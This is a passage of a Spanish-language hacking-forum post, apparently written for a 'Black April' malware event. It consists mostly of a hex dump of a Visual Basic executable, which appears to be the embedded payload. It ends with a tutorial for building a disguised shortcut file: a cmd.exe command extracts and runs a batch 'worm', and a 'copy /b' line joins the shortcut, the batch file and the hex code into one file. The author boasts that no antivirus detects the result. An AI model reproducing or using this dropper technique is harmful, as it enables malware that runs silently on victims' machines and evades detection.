558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B0040000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  2.  


ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto


copy /b 6.lnk+comandos.bat+code.txt w.lnk


como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$  ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años Feliz Abril Negro

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora


Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines